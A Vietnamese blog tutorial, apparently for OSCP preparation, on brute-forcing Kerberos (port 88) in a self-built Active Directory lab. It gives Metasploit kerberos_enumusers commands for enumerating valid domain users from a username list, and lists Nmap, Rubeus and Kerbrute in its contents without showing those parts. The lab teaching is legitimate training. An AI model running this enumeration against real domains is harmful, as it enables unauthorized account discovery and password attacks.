PreOSCP : Kerberos Brute Force Attack

Để thực hành bài này các bạn cần dựng PLAB Domain với AD và các máy thành viên mô phỏng hệ thống Security365 Practice Lab với máy chủ quản trị miền là Domain Controller PLABDC01, máy chủ thành viên miền là PLABDM01 cùng với 1 thành viên là Windows 10. DOmain name là ignite.local thay bằng PRACTICELAB.COM

Trong phạm vi PreOSCP các bạn cần quan tâm đến thao tác brutefroce với nmap nse và kerbrute. Hãy dựng ad lab như hướng dẫn

Tạo một số tài khoản trên Domain Controller ví dụ yashika,geet,aavti .., và trên Kali Linux tạo 1 file là user.txt có chưa vài tên các tài khoản này như yashika,geet,aavti và raj … để tiến hành bruteforce

Máy tấn công ta se dùng Kali Linux 2021, mô hình tham khảo như hình sau

Trong bài học trước, chúng ta đã giải thích về Forge Kerberos Ticket “ Domain Persistence: Golden Ticket Attack ”, thảo luận về cách thức quá trình xác thực Kerberos và thành phần dịch vụ của nó. Trong bài đăng này, chúng tôi sẽ thực hiện tấn công brute force vào Cổng 88 được sử dụng cho dịch vụ Kerberos để liệt kê tên người dùng và mật khẩu hợp lệ.

Địa chỉ IP 192.168.0.1 có thể thay bằng 192.168.0.105 cho tương ứng với bài hướng dẫn

Mục lục

  • Metasploit
  • Nmap
  • Rubeus
  • Kerbrute

Metasploit

Mô-đun này sẽ liệt kê Người dùng hợp lệ trên domain qua Kerberos từ góc độ chưa được xác thực, sử dụng các phản hồi khác nhau do dịch vụ trả lại cho người dùng hợp lệ và không hợp lệ. Trên Kali Linux chạy Metasploti Framework và thực hiện các lệnh sau

1
2
3
4
5
msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(gather/kerberos_enumusers) > set rhosts 192.168.1.105
msf auxiliary(gather/kerberos_enumusers) > set User_File /root/user.txt
msf auxiliary(gather/kerberos_enumusers) > set Domain ignite.local
msf auxiliary(gather/kerberos_enumusers) > exploit

Xem chi tiết tại đây

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s